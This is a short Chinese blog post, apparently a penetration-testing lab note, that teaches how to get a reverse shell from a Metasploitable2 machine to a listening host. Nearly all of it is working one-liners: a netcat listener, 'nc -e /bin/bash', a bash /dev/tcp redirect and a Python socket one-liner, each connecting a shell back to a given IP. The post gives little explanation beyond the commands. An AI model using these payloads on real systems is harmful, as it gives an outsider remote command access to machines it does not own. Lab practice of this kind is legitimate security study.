linux系统常用命令利用——反弹shell
程序员文章站
2022-07-15 15:46:19
...
一、环境
Aliyun Linux (192.168.47.136)
Metasploitable2 Linux (192.169.47.133)
目的: 将Metasploitable 的 shell 反弹给 Aliyun
二、具体实操
2.1 通过 linux 命令 NC
1、首先 Aliyun 侦听某个端口 如 4444 端口
nc -nvlp 4444
2、Meta..上执行:
nc -e /bin/bash 192.168.47.136 4444
2.2 通过bash命令
1、首先 Aliyun 侦听某个端口 如 4444 端口
nc -nvlp 4444
2、Meta..上执行:
bash -i >& /dev/tcp/192.168.47.136/4444 0>&1
2.3 通过python命令
1、首先 Aliyun 侦听某个端口 如 4444 端口
nc -nvlp 4444
2、Meta..上执行:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.47.136',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
以上就是一般 linux 系统自带命令的利用反弹 shell 步骤了!
其他需要自己安装配置的命令就不写了!
上一篇: 手工挖洞学习笔记:dvwa命令执行漏洞/载入php反弹shell
下一篇: 代码执行漏洞
推荐阅读